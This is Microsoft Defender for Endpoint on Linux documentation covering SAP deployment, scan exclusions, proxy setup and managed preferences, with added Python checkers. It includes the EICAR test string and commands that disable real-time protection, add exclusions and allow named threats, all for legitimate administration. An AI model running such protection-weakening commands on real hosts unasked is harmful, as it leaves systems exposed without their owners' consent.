Privacy for Microsoft Defender for Endpoint on Linux

What's new in Microsoft Defender for Endpoint on Linux

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Deployment guidance for Microsoft
Defender for Endpoint on Linux for SAP
Article • 01/17/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2

This article provides deployment guidance for Microsoft Defender for Endpoint on Linux
for SAP. This article includes recommended SAP OSS (Online Services System) notes, the
system requirements, prerequisites, important configuration settings, recommended
antivirus exclusions, and guidance on scheduling antivirus scans.

Conventional security defenses that have been commonly used to protect SAP systems
such as isolating infrastructure behind firewalls and limiting interactive operating system
logons are no longer considered sufficient to mitigate modern sophisticated threats. It's
essential to deploy modern defenses to detect and contain threats in real-time. SAP
applications unlike most other workloads require basic assessment and validation before
deploying Microsoft Defender for Endpoint. The Enterprise Security administrators
should contact the SAP Basis Team prior to deploying Defender for Endpoint. The SAP
Basis Team should be cross trained with a basic level of knowledge about Defender for
Endpoint.

Recommended SAP OSS Notes

2248916 - Which files and directories should be excluded from an antivirus scan for SAP BusinessObjects Business Intelligence Platform products in Linux/Unix? - SAP ONE Support Launchpad
1984459 - Which files and directories should be excluded from an antivirus scan for SAP Data Services - SAP ONE Support Launchpad
2808515 - Installing security software on SAP servers running on Linux - SAP ONE Support Launchpad
1730930 - Using antivirus software in an SAP HANA appliance - SAP ONE Support Launchpad
1730997 - Unrecommended versions of antivirus software - SAP ONE Support Launchpad

SAP Applications on Linux

SAP only supports Suse, Redhat, and Oracle Linux. Other distributions aren't
supported for SAP S4 or NetWeaver applications.
Suse 15.x, Redhat 8.x or 9.x and Oracle Linux 8.x are strongly recommended.
Suse 12.x, Redhat 7.x and Oracle Linux 7.x are technically supported but weren't
extensively tested.
Suse 11.x, Redhat 6.x and Oracle Linux 6.x might not be supported and weren't
tested.
Suse and Redhat offer tailored distributions for SAP. These "for SAP" versions of
Suse and Redhat might have different packages preinstalled and possibly different
kernels.
SAP only supports certain Linux File systems. In general, XFS and EXT3 are used.
Oracle Automatic Storage Management (ASM) filesystem is sometimes used for
Oracle DBMS and can't be read by Defender for Endpoint.
Some SAP applications use "standalone engines" such as TREX, Adobe Document
Server, Content Server and LiveCache. These engines require specific configuration
and file exclusions.
SAP applications often have Transport and Interface directories with many thousands of small files. If the number of files is larger than 100,000, it might affect performance. It's recommended to archive files.
It's strongly recommended to deploy Defender for Endpoint to nonproductive SAP
landscapes for several weeks before deploying to production. The SAP Basis Team
should use tools such as sysstat, KSAR, and nmon to verify if CPU and other
performance parameters are impacted.

Prerequisites for deploying Microsoft Defender for Endpoint on Linux on SAP VMs

Microsoft Defender for Endpoint version >= 101.23082.0009 | Release version:
30.123082.0009 or higher must be deployed.
Microsoft Defender for Endpoint on Linux supports all the Linux releases used by
SAP applications.
Microsoft Defender for Endpoint on Linux requires connectivity to specific Internet
endpoints from VMs to update antivirus Definitions.
Microsoft Defender for Endpoint on Linux requires some crontab (or other task
scheduler) entries to schedule scans, log rotation, and Microsoft Defender for
Endpoint updates. Enterprise Security teams normally manage these entries. Refer
to How to schedule an update of the Microsoft Defender for Endpoint (Linux) |
Microsoft Learn.
The default configuration option for deployment as an Azure Extension for AntiVirus (AV) will be Passive Mode. This means that the AV component of Microsoft Defender for Endpoint won't intercept IO calls. It's recommended to run Microsoft Defender for Endpoint in Passive Mode on all SAP applications and to schedule a scan once per day. In this mode:

Real-time protection is turned off: Threats aren't remediated by Microsoft Defender Antivirus.
On-demand scanning is turned on: Still use the scan capabilities on the endpoint.
Automatic threat remediation is turned off: No files are moved and the security administrator is expected to take required action.
Security intelligence updates are turned on: Alerts are available on the security administrator's tenant.

The Linux crontab is typically used to schedule Microsoft Defender for Endpoint AV scan
and log rotation tasks: How to schedule scans with Microsoft Defender for Endpoint
(Linux) | Microsoft Learn

Endpoint Detection and Response (EDR) functionality is active whenever Microsoft Defender for Endpoint on Linux is installed. There's no simple way to disable EDR functionality through the command line or configuration. For more information on troubleshooting EDR, see the sections Useful Commands and Useful Links.

Important Configuration Settings for Microsoft Defender for Endpoint on SAP on Linux

It's recommended to check the installation and configuration of Defender for Endpoint with the command mdatp health.

The key parameters recommended for SAP applications are:

healthy = true
release_ring = Production. Prerelease and insider rings shouldn't be used with SAP applications.
real_time_protection_enabled = false. Real-time protection is off in passive mode, which is the default mode and prevents real-time IO interception.
automatic_definition_update_enabled = true
definition_status = "up_to_date". Run a manual update if a different value is shown.
edr_early_preview_enabled = "disabled". If enabled on SAP systems it might lead to system instability.
conflicting_applications = [ ]. Other AV or security software installed on a VM, such as ClamAV.
supplementary_events_subsystem = "ebpf". Don't proceed if ebpf isn't displayed. Contact the security admin team.

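The parser below, an added example and not Microsoft or SAP tooling, reads the key : value layout that mdatp health prints and compares the fields above to the values this section recommends. It also performs the conflicting_applications check from step 7 of the general deployment guidance (anything other than an empty list or "unavailable" means another fanotify consumer is installed). Both health outputs are constructed samples; the InsiderFast ring name and the clamd entry in the second are illustrative.

```python
"""Evaluate `mdatp health` output against the values recommended for SAP hosts.

Added example, not part of the Microsoft or SAP documentation. parse_health() reads
the `key : value` layout that `mdatp health` prints (quoted strings, true/false,
[] lists); SAP_EXPECTED is the parameter list above. Both sample outputs are
constructed rather than captured from a real system.
"""
import subprocess

SAP_EXPECTED = {
    "healthy": "true",
    "release_ring": "Production",
    "real_time_protection_enabled": "false",   # passive mode, the SAP recommendation
    "automatic_definition_update_enabled": "true",
    "definition_status": "up_to_date",
    "edr_early_preview_enabled": "disabled",
    "supplementary_events_subsystem": "ebpf",
}


def parse_health(text: str) -> dict:
    """Turn `mdatp health` text into a dict of str or list values."""
    fields = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        if value.startswith("[") and value.endswith("]"):
            inner = value[1:-1].strip()
            fields[key] = [v.strip().strip('"') for v in inner.split(",")] if inner else []
        else:
            fields[key] = value.strip('"')
    return fields


def evaluate(fields: dict, expected: dict = SAP_EXPECTED) -> list:
    """Return human-readable problems; an empty list means every check passed."""
    problems = []
    for key, want in expected.items():
        got = fields.get(key)
        if got is None:
            problems.append(f"{key}: not reported")
        elif got != want:
            problems.append(f"{key}: got {got!r}, expected {want!r}")
    conflicts = fields.get("conflicting_applications", [])
    if isinstance(conflicts, str):                     # "unavailable" or a bare name
        conflicts = [] if conflicts in ("", "unavailable") else [conflicts]
    if conflicts:
        problems.append("conflicting_applications: uninstall " + ", ".join(conflicts)
                        + " first; two fanotify consumers cause hangs and kernel panics")
    return problems


def check_live_host(expected: dict = SAP_EXPECTED) -> list:
    """Run `mdatp health` on this machine and evaluate it (needs the agent installed)."""
    out = subprocess.run(["mdatp", "health"], capture_output=True, text=True, check=True).stdout
    return evaluate(parse_health(out), expected)


# Constructed sample of a host that meets the SAP recommendations.
HEALTHY_SAMPLE = """\
healthy                                 : true
health_issues                           : []
licensed                                : true
app_version                             : "101.23082.0009"
release_ring                            : "Production"
real_time_protection_enabled            : false
automatic_definition_update_enabled     : true
definition_status                       : "up_to_date"
edr_early_preview_enabled               : "disabled"
conflicting_applications                : []
supplementary_events_subsystem          : "ebpf"
"""

# Constructed sample of a host that must not go to production as-is.
UNSUITABLE_SAMPLE = """\
healthy                                 : true
release_ring                            : "InsiderFast"
real_time_protection_enabled            : true
automatic_definition_update_enabled     : true
definition_status                       : "up_to_date"
edr_early_preview_enabled               : "enabled"
conflicting_applications                : ["clamd"]
supplementary_events_subsystem          : "auditd"
"""

if __name__ == "__main__":
    for label, sample in (("healthy", HEALTHY_SAMPLE), ("unsuitable", UNSUITABLE_SAMPLE)):
        problems = evaluate(parse_health(sample))
        print(f"== {label}: {'OK' if not problems else str(len(problems)) + ' problem(s)'}")
        for p in problems:
            print("  -", p)
```

Run `check_live_host()` from the Basis team's pre-production checklist and treat a non-empty result as a stop: the supplementary_events_subsystem and release_ring lines in particular are the ones this section says must be right before any SAP landscape is onboarded.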
This article has some useful hints on troubleshooting installation issues for Microsoft
Defender for Endpoint: Troubleshoot installation issues for Microsoft Defender for
Endpoint on Linux

Recommended Microsoft Defender for Endpoint Antivirus Exclusions for SAP on Linux

Enterprise Security Team must obtain a full list of antivirus exclusions from the SAP
Administrators (typically the SAP Basis Team). It's recommended to initially exclude:

DBMS data files, log files and temp files, including disks containing backup files
The entire contents of the SAPMNT directory
The entire contents of the SAPLOC directory
The entire contents of the TRANS directory
The entire contents of directories for standalone engines such as TREX
Hana – exclude /hana/shared, /hana/data, and /hana/log - see Note 1730930
SQL Server – Configure antivirus software to work with SQL Server - SQL Server |
Microsoft Learn
Oracle – See How To Configure Anti-Virus On Oracle Database Server (Doc ID
782354.1)
DB2 – https://www.ibm.com/support/pages/which-db2-directories-exclude-linux-
anti-virus-software
SAP ASE – contact SAP
MaxDB – contact SAP

Oracle ASM systems don't need exclusions as Microsoft Defender for Endpoint can't
read ASM disks.

Customers with Pacemaker clusters should also configure these exclusions:

Bash

mdatp exclusion folder add --path /usr/lib/pacemaker/

(On RedHat the Pacemaker directory is /var/lib/pacemaker/, so use that path instead.)

Bash

mdatp exclusion process add --name pacemakerd

Bash

mdatp exclusion process add --name 'crm_*'

Quote the wildcard so the shell doesn't expand crm_* against the current directory before mdatp sees it. These are name-only process exclusions; as noted in the general deployment guidance, a full-path exclusion is the safer form where the product accepts one.

Customers running the Azure security policy might find that it triggers scans with the free ClamAV engine (via the azsecd agent). It's recommended to disable the ClamAV scan after a VM has been protected with Microsoft Defender for Endpoint, using the following commands:

Bash

sudo azsecd config -s clamav -d "Disabled"

Bash

sudo service azsecd restart

Bash

sudo azsecd status

The following articles detail how to configure AV exclusions for processes, files, and
folders per individual VM:

Set up exclusions for Microsoft Defender Antivirus scans | Microsoft Learn
Common mistakes to avoid when defining exclusions | Microsoft Learn

Scheduling a Daily AV Scan

The recommended configuration for SAP applications disables real-time interception of
IO calls for AV scanning. The recommended setting is passive mode, in which
real_time_protection_enabled = false.

The following link details how to schedule a scan: How to schedule scans with Microsoft
Defender for Endpoint (Linux) | Microsoft Learn.

Large SAP systems might have more than 20 SAP application servers each with a
connection to the SAPMNT NFS share. Twenty or more application servers
simultaneously scanning the same NFS server will likely overload the NFS server. By
default, Defender for Endpoint on Linux doesn't scan NFS sources.

If there's a requirement to scan SAPMNT, then this scan should be configured on one or
two VMs only.
Scheduled scans for SAP ECC, BW, CRM, SCM, Solution Manager, and other components
should be staggered at different times so that the SAP components don't all overload the
NFS storage they share at the same moment.

Useful Commands
If, during manual zypper installation on SUSE, the error "Nothing provides
'policycoreutils'" occurs, refer to: Troubleshoot installation issues for Microsoft Defender
for Endpoint on Linux.

There are several command-line commands that can control the operation of mdatp. To
enable passive mode, you can use the following command:

Bash

mdatp config passive-mode --value enabled

7 Note

Passive mode is the default mode when installing Defender for Endpoint on Linux.

To turn off real-time protection, you can use the command:

Bash

mdatp config real-time-protection --value disabled

This command tells mdatp to retrieve the latest definitions from the cloud:

Bash

mdatp definitions update

This command tests whether mdatp can connect to the cloud-based endpoints via the
network:

Bash

mdatp connectivity test

These commands update the mdatp software, if needed:

Bash

yum update mdatp      # RHEL family

Bash

zypper update mdatp   # SUSE

Since mdatp runs as a Linux system service, you can control mdatp using the service
command, for example:

Bash

service mdatp status

This command creates a diagnostic file that can be uploaded to Microsoft support:

Bash

sudo mdatp diagnostic create

Useful Links

Microsoft Endpoint Manager doesn't support Linux at this time
Manage Microsoft Defender for Endpoint configuration settings on devices with Microsoft Endpoint Manager | Microsoft Learn
Microsoft Defender for Endpoint Linux - Configuration and Operation Command List - Microsoft Tech Community
Deploying Microsoft Defender for Endpoint on Linux Servers - Microsoft Tech Community
Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on Linux | Microsoft Docs
Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux | Microsoft Docs

Configure and validate exclusions for Microsoft Defender for Endpoint on Linux
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

This article provides information on how to define exclusions that apply to on-demand
scans, and real-time protection and monitoring.

) Important

The exclusions described in this article don't apply to other Defender for Endpoint
on Linux capabilities, including endpoint detection and response (EDR). Files that
you exclude using the methods described in this article can still trigger EDR alerts
and other detections. For EDR exclusions, contact support.

You can exclude certain files, folders, processes, and process-opened files from Defender
for Endpoint on Linux scans.

Exclusions can be useful to avoid incorrect detections on files or software that are
unique or customized to your organization. They can also be useful for mitigating
performance issues caused by Defender for Endpoint on Linux.

2 Warning

Defining exclusions lowers the protection offered by Defender for Endpoint on
Linux. You should always evaluate the risks that are associated with implementing
exclusions, and you should only exclude files that you are confident are not
malicious.

Supported exclusion types
The following table shows the exclusion types supported by Defender for Endpoint on
Linux.

Exclusion – Definition – Examples

File extension – All files with the extension, anywhere on the device. Examples: .test
File – A specific file identified by the full path. Examples: /var/log/test.log, /var/log/*.log, /var/log/install.?.log
Folder – All files under the specified folder (recursively). Examples: /var/log/, /var/*/
Process – A specific process (specified either by the full path or file name) and all files opened by it. Examples: /bin/cat, cat, c?t

) Important

The paths above must be hard links, not symbolic links, in order to be successfully
excluded. You can check if a path is a symbolic link by running file <path-name> .

File, folder, and process exclusions support the following wildcards:

Wildcard – Description – Examples

* – Matches any number of any characters, including none. If this wildcard is not used at the end of the path, it substitutes only one folder. Examples: /var/*/tmp includes any file in /var/abc/tmp and its subdirectories, and /var/def/tmp and its subdirectories; it does not include /var/abc/log or /var/def/log. /var/*/ includes any file in /var and its subdirectories.
? – Matches any single character. Examples: file?.log includes file1.log and file2.log, but not file123.log.

7 Note

When using the * wildcard at the end of the path, it will match all files and
subdirectories under the parent of the wildcard.

How to configure the list of exclusions

From the management console

For more information on how to configure exclusions from Puppet, Ansible, or another
management console, see Set preferences for Defender for Endpoint on Linux.

From the command line

Run the following command to see the available switches for managing exclusions:

Bash

mdatp exclusion

 Tip

When configuring exclusions with wildcards, enclose the parameter in double quotes to prevent globbing.

Examples:

Add an exclusion for a file extension:

Bash

mdatp exclusion extension add --name .txt

Console

Extension exclusion configured successfully

Add an exclusion for a file:

Bash

mdatp exclusion file add --path /var/log/dummy.log

Console

File exclusion configured successfully

Add an exclusion for a folder:

Bash

mdatp exclusion folder add --path /var/log/

Console

Folder exclusion configured successfully

Add an exclusion for a second folder:

Bash

mdatp exclusion folder add --path /var/log/
mdatp exclusion folder add --path /other/folder

Console

Folder exclusion configured successfully

Add an exclusion for a folder with a wildcard in it:

Bash

mdatp exclusion folder add --path "/var/*/tmp"

7 Note

This excludes only paths below /var/*/tmp/, not folders that are siblings of tmp; for
example, /var/this-subfolder/tmp is excluded, but /var/this-subfolder/log is not.

Bash

mdatp exclusion folder add --path "/var/"

OR

Bash

mdatp exclusion folder add --path "/var/*/"

7 Note

This excludes all paths whose parent is /var/; for example,
/var/this-subfolder/and-this-subfolder-as-well.

Console

Folder exclusion configured successfully

Add an exclusion for a process:

Bash

mdatp exclusion process add --name cat

Console

Process exclusion configured successfully

Add an exclusion for a second process:

Bash

mdatp exclusion process add --name cat
mdatp exclusion process add --name dog

Console

Process exclusion configured successfully


Validate exclusion lists with the EICAR test file
You can validate that your exclusion lists are working by using curl to download a test
file.

In the following Bash snippet, replace test.txt with a file that conforms to your
exclusion rules. For example, if you have excluded the .testing extension, replace
test.txt with test.testing . If you are testing a path, ensure that you run the command
within that path.

Bash

curl -o test.txt https://secure.eicar.org/eicar.com.txt

If Defender for Endpoint on Linux reports malware, then the rule is not working. If there
is no report of malware, and the downloaded file exists, then the exclusion is working.
You can open the file to confirm that the contents are the same as what is described on
the EICAR test file website.

If you do not have Internet access, you can create your own EICAR test file. Write the
EICAR string to a new text file with the following Bash command:

Bash

echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > test.txt

You can also copy the string into a blank text file and attempt to save it with the file
name or in the folder you are attempting to exclude.
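As an added example (not code from this page or from Microsoft), the following Python models the exclusion types and wildcard rules documented above, so that an administrator can check which exclusions would cover a given path or process before deploying them, and confirm that the path chosen for the EICAR test file is actually covered. The exclusion list is constructed from this page's own examples; the mdatp CLI itself is not called.

```python
"""Pre-check which Defender for Endpoint on Linux exclusions would cover a path or process."""
import re
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class Exclusion:
    kind: str    # "extension", "file", "folder" or "process"
    value: str   # the extension, path, folder or process name/path as given to mdatp


def wildcard_to_regex(pattern: str) -> str:
    """Translate the documented wildcards into a regular expression."""
    pieces = []
    last = len(pattern) - 1
    for i, ch in enumerate(pattern):
        if ch == "*":
            # A trailing * covers every file and subdirectory under the parent;
            # anywhere else it stands in for a single path component only.
            pieces.append(".*" if i == last else "[^/]*")
        elif ch == "?":
            pieces.append("[^/]")      # any single character, never a separator
        else:
            pieces.append(re.escape(ch))
    return "".join(pieces)


def _folder_covers(pattern: str, path: str) -> bool:
    folder = pattern.rstrip("/")
    if not folder:                      # excluding "/" covers every absolute path
        return path.startswith("/")
    # The folder itself plus everything below it (folder exclusions are recursive).
    return re.fullmatch(wildcard_to_regex(folder) + "(?:/.*)?", path) is not None


def matches(exclusion: Exclusion, target: str) -> bool:
    """True when target (a file path, or a process name/path for process exclusions) is covered."""
    basename = target.rsplit("/", 1)[-1]
    if exclusion.kind == "extension":
        return basename.endswith(exclusion.value)
    if exclusion.kind == "file":
        return re.fullmatch(wildcard_to_regex(exclusion.value), target) is not None
    if exclusion.kind == "folder":
        return _folder_covers(exclusion.value, target)
    if exclusion.kind == "process":
        # A process exclusion is given either as a bare name or as a full path.
        subject = target if "/" in exclusion.value else basename
        return re.fullmatch(wildcard_to_regex(exclusion.value), subject) is not None
    raise ValueError(f"unknown exclusion kind: {exclusion.kind}")


def covering_exclusions(exclusions: List[Exclusion], path: str) -> List[Exclusion]:
    """Scan exclusions (extension, file, folder) that would keep path out of a scan."""
    return [e for e in exclusions if e.kind != "process" and matches(e, path)]


def process_is_excluded(exclusions: List[Exclusion], process: str) -> bool:
    """Whether files opened by process (name or full path) are excluded from scanning."""
    return any(matches(e, process) for e in exclusions if e.kind == "process")


def to_mdatp_command(exclusion: Exclusion) -> str:
    """The mdatp CLI line for this exclusion, double-quoting wildcards as the Tip above advises."""
    option = "--path" if exclusion.kind in ("file", "folder") else "--name"
    value = exclusion.value
    if any(c in value for c in "*?"):
        value = f'"{value}"'
    return f"mdatp exclusion {exclusion.kind} add {option} {value}"


# Constructed exclusion list, built from the examples on this page.
EXCLUSIONS = [
    Exclusion("extension", ".testing"),
    Exclusion("file", "/var/log/install.?.log"),
    Exclusion("file", "/var/log/*.log"),
    Exclusion("folder", "/var/*/tmp"),
    Exclusion("folder", "/other/folder"),
    Exclusion("process", "c?t"),
]

if __name__ == "__main__":
    for e in EXCLUSIONS:
        print(to_mdatp_command(e))
    # Before running the EICAR check, confirm the test file's path is actually covered.
    for candidate in ("/var/abc/tmp/test.txt", "/var/abc/log/test.txt", "/tmp/test.testing"):
        print(candidate, "->", [e.value for e in covering_exclusions(EXCLUSIONS, candidate)])
```

Paths must still be real (hard-linked) locations as the Important note above requires; this check only reasons about the pattern text.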

Allow threats
In addition to excluding certain content from being scanned, you can also configure the
product not to detect some classes of threats (identified by the threat name). You
should exercise caution when using this functionality, as it can leave your device
unprotected.

To add a threat name to the allowed list, execute the following command:

Bash

mdatp threat allowed add --name [threat-name]


The threat name associated with a detection on your device can be obtained using the
following command:

Bash

mdatp threat list

For example, to add EICAR-Test-File (not a virus) (the threat name associated with
the EICAR detection) to the allowed list, execute the following command:

Bash

mdatp threat allowed add --name "EICAR-Test-File (not a virus)"

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Configure Microsoft Defender for Endpoint on Linux for static proxy discovery
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Endpoint can discover a proxy server using the HTTPS_PROXY
environment variable. This setting must be configured both at installation time and after
the product has been installed.

Installation time configuration

During installation, the HTTPS_PROXY environment variable must be passed to the
package manager. The package manager can read this variable in any of the following
ways:

The HTTPS_PROXY variable is defined in /etc/environment with the following line:

Bash

HTTPS_PROXY="http://proxy.server:port/"

The HTTPS_PROXY variable is defined in the package manager global configuration.
For example, in Ubuntu 18.04, you can add the following line to
/etc/apt/apt.conf.d/proxy.conf:

Bash

Acquire::https::Proxy "http://proxy.server:port/";

U Caution

The above two methods could define the proxy used by other applications on your
system. Use them with caution, or only if a generally global proxy configuration is
intended.

The HTTPS_PROXY variable is prepended to the installation or uninstallation
commands. For example, with the APT package manager, prepend the variable as
follows when installing Microsoft Defender for Endpoint:

Bash

HTTPS_PROXY="http://proxy.server:port/" apt install mdatp

7 Note

Do not add sudo between the environment variable definition and apt,
otherwise the variable will not be propagated.

The HTTPS_PROXY environment variable may similarly be defined during uninstallation.

Note that installation and uninstallation will not necessarily fail if a proxy is required but
not configured. However, telemetry will not be submitted, and the operation could take
much longer due to network timeouts.

Post installation configuration

After installation, configure Defender for Endpoint with static proxy using the following
method:

Bash

mdatp config proxy set --value http://address:port

7 Note

This method works for every distribution of Defender for Endpoint on Linux and is
recommended.

The HTTPS_PROXY environment variable must be defined in the Defender for Endpoint
service file. To do this, run sudo systemctl edit --full mdatp.service. You can then
propagate the variable to the service in one of two ways:

1. Uncomment the line #Environment="HTTPS_PROXY=http://address:port" and specify
your static proxy address.

2. Add a line EnvironmentFile=/path/to/env/file. This path can point to
/etc/environment or a custom file, either of which needs to contain the following line:

Bash

HTTPS_PROXY="http://proxy.server:port/"

After modifying mdatp.service , save the file and restart the service so the changes can
be applied using the following commands:

Bash

sudo systemctl daemon-reload; sudo systemctl restart mdatp

7 Note

To remove any additions you might have made before uninstalling mdatp , delete
the custom file from /etc/systemd/system .

7 Note

Red Hat Enterprise Linux 6.X and CentOS 6.X don't support the systemctl and
/etc/environment methods. To configure a static proxy for MDE on these
distributions, use the recommended mdatp config proxy set method.

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Set preferences for Microsoft Defender for Endpoint on Linux
Article • 02/14/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

) Important

This topic contains instructions for how to set preferences for Defender for
Endpoint on Linux in enterprise environments. If you are interested in configuring
the product on a device from the command-line, see Resources.

In enterprise environments, Defender for Endpoint on Linux can be managed through a
configuration profile. This profile is deployed from the management tool of your choice.
Preferences managed by the enterprise take precedence over the ones set locally on the
device. In other words, users in your enterprise aren't able to change preferences that
are set through this configuration profile. If exclusions were added through the
managed configuration profile, they can only be removed through the managed
configuration profile. The command line works for exclusions that were added locally.

This article describes the structure of this profile (including a recommended profile that
you can use to get started) and instructions on how to deploy the profile.

Configuration profile structure

The configuration profile is a .json file that consists of entries identified by a key (which
denotes the name of the preference), followed by a value, which depends on the nature
of the preference. Values can be simple, such as a numerical value, or complex, such as a
nested list of preferences.

Typically, you would use a configuration management tool to push a file with the name
mdatp_managed.json to the location /etc/opt/microsoft/mdatp/managed/.
The top level of the configuration profile includes product-wide preferences and entries
for subareas of the product, which are explained in more detail in the next sections.

Antivirus engine preferences

The antivirusEngine section of the configuration profile is used to manage the
preferences of the antivirus component of the product.

Description Value
Key antivirusEngine
Data type Dictionary (nested preference)
Comments See the following sections for a description of the dictionary contents.

Enforcement level for antivirus engine

Specifies the enforcement preference of the antivirus engine. There are three values for
setting the enforcement level:

Real-time (real_time): Real-time protection (scan files as they're modified) is enabled.
On-demand (on_demand): Files are scanned only on demand. In this mode, real-time protection is turned off.
Passive (passive): Runs the antivirus engine in passive mode. In this mode:
  Real-time protection is turned off: threats are not remediated by Microsoft Defender Antivirus.
  On-demand scanning is turned on: the scan capabilities on the endpoint can still be used.
  Automatic threat remediation is turned off: no files are moved, and the security admin is expected to take the required action.
  Security intelligence updates are turned on: alerts are available in the security admin's tenant.

Description Value
Key enforcementLevel
Data type String
Possible values real_time, on_demand, passive (default)
Comments Available in Defender for Endpoint version 101.10.72 or higher. The default changed from real_time to passive for Defender for Endpoint version 101.23062.0001 or higher.

Enable/disable behavior-monitoring
Determines whether behavior monitoring and blocking capability is enabled on the
device or not.

7 Note

This feature is applicable only when Real-Time Protection feature is enabled.

Description Value
Key behaviorMonitoring
Data type String
Possible values disabled (default), enabled
Comments Available in Defender for Endpoint version 101.45.00 or higher.

Run a scan after definitions are updated

Specifies whether to start a process scan after new security intelligence updates are
downloaded on the device. Enabling this setting triggers an antivirus scan on the
running processes of the device.

Description Value
Key scanAfterDefinitionUpdate
Data type Boolean
Possible values true (default), false
Comments Available in Defender for Endpoint version 101.45.00 or higher.

Scan archives (on-demand antivirus scans only)

Specifies whether to scan archives during on-demand antivirus scans.

7 Note

Archive files are never scanned during real time protection. When the files in an
archive are extracted, they are scanned. The scanArchives option can be used to
force the scan of archives only during on-demand scan.

Description Value
Key scanArchives
Data type Boolean
Possible values true (default), false
Comments Available in Microsoft Defender for Endpoint version 101.45.00 or higher.

Degree of parallelism for on-demand scans

Specifies the degree of parallelism for on-demand scans. This corresponds to the
number of threads used to perform the scan and impacts the CPU usage, and the
duration of the on-demand scan.

Description Value
Key maximumOnDemandScanThreads
Data type Integer
Possible values 2 (default). Allowed values are integers between 1 and 64.
Comments Available in Microsoft Defender for Endpoint version 101.45.00 or higher.

Exclusion merge policy


Specifies the merge policy for exclusions. It can be a combination of administrator-
defined and user-defined exclusions ( merge ) or only administrator-defined exclusions
( admin_only ). This setting can be used to restrict local users from defining their own
exclusions.

Description Value
Key exclusionsMergePolicy
Data type String
Possible values merge (default), admin_only
Comments Available in Defender for Endpoint version 100.83.73 or higher.

Scan exclusions

Entities that have been excluded from the scan. Exclusions can be specified by full paths,
extensions, or file names. (Exclusions are specified as an array of items, administrator can
specify as many elements as necessary, in any order.)

Description Value
Key exclusions
Data type Dictionary (nested preference)
Comments See the following sections for a description of the dictionary contents.

Type of exclusion

Specifies the type of content excluded from the scan.


Description Value
Key $type
Data type String
Possible values excludedPath, excludedFileExtension, excludedFileName

Path to excluded content

Used to exclude content from the scan by full file path.

Description Value
Key path
Data type String
Possible values valid paths
Comments Applicable only if $type is excludedPath

Path type (file / directory)

Indicates if the path property refers to a file or directory.

Description Value
Key isDirectory
Data type Boolean
Possible values false (default), true
Comments Applicable only if $type is excludedPath

File extension excluded from the scan


Used to exclude content from the scan by file extension.

Description Value
Key extension
Data type String
Possible values valid file extensions
Comments Applicable only if $type is excludedFileExtension

Process excluded from the scan

Specifies a process for which all file activity is excluded from scanning. The process can
be specified either by its name (for example, cat) or full path (for example, /bin/cat).

Description Value
Key name
Data type String
Possible values any string
Comments Applicable only if $type is excludedFileName

Muting Non Exec mounts

Specifies the behavior of RTP on mount points marked as noexec. The two values for this
setting are:

Unmuted (unmute): The default value; all mount points are scanned as part of RTP.
Muted (mute): Mount points marked as noexec aren't scanned as part of RTP. Such mount points can be created for:
  Database files on database servers, for keeping database files.
  File servers, which can keep data-file mount points with the noexec option.
  Backups, which can keep data-file mount points with the noexec option.

Description Value
Key nonExecMountPolicy
Data type String
Possible values unmute (default), mute
Comments Available in Defender for Endpoint version 101.85.27 or higher.

Unmonitor Filesystems

Configure filesystems to be unmonitored (excluded) from Real Time Protection (RTP). The
filesystems configured are validated against Microsoft Defender's list of permitted
filesystems; only after successful validation is the filesystem allowed to be
unmonitored. These unmonitored filesystems will still be scanned by Quick, Full, and
custom scans.

Description Value
Key unmonitoredFilesystems
Data type Array of strings
Comments A configured filesystem will be unmonitored only if it is present in Microsoft's list of permitted unmonitored filesystems.

By default, NFS and Fuse are unmonitored from RTP, Quick, and Full scans. However,
they can still be scanned by a custom scan. For example, to remove NFS from the list of
unmonitored filesystems list, update the managed config file as shown below. This will
automatically add NFS to the list of monitored filesystems for RTP.

JSON

{
  "antivirusEngine": {
    "unmonitoredFilesystems": ["Fuse"]
  }
}

To remove both NFS and Fuse from the unmonitored list of filesystems, do the following:

JSON

{
  "antivirusEngine": {
    "unmonitoredFilesystems": []
  }
}

7 Note

Below is the default list of monitored filesystems for RTP:

[btrfs, ecryptfs, ext2, ext3, ext4, fuseblk, jfs, overlay, ramfs, reiserfs, tmpfs, vfat, xfs]

If any monitored filesystem needs to be added to the list of unmonitored
filesystems, then it needs to be evaluated and enabled by Microsoft via cloud
config. Following that, customers can update mdatp_managed.json to unmonitor
that filesystem.

Configure file hash computation feature

Enables or disables the file hash computation feature. When this feature is enabled,
Defender for Endpoint computes hashes for files it scans. Note that enabling this feature
might impact device performance. For more details, refer to: Create indicators for files.

Description Value
Key enableFileHashComputation
Data type Boolean
Possible values false (default), true
Comments Available in Defender for Endpoint version 101.85.27 or higher.

Allowed threats

List of threats (identified by their name) that aren't blocked by the product and are
instead allowed to run.

Description Value
Key allowedThreats
Data type Array of strings

Disallowed threat actions

Restricts the actions that the local user of a device can take when threats are detected.
The actions included in this list aren't displayed in the user interface.

Description Value
Key disallowedThreatActions
Data type Array of strings
Possible values allow (restricts users from allowing threats), restore (restricts users from restoring threats from the quarantine)
Comments Available in Defender for Endpoint version 100.83.73 or higher.

Threat type settings

The threatTypeSettings preference in the antivirus engine is used to control how certain
threat types are handled by the product.

Description Value
Key threatTypeSettings
Data type Dictionary (nested preference)
Comments See the following sections for a description of the dictionary contents.

Threat type

Type of threat for which the behavior is configured.

Description Value
Key key
Data type String
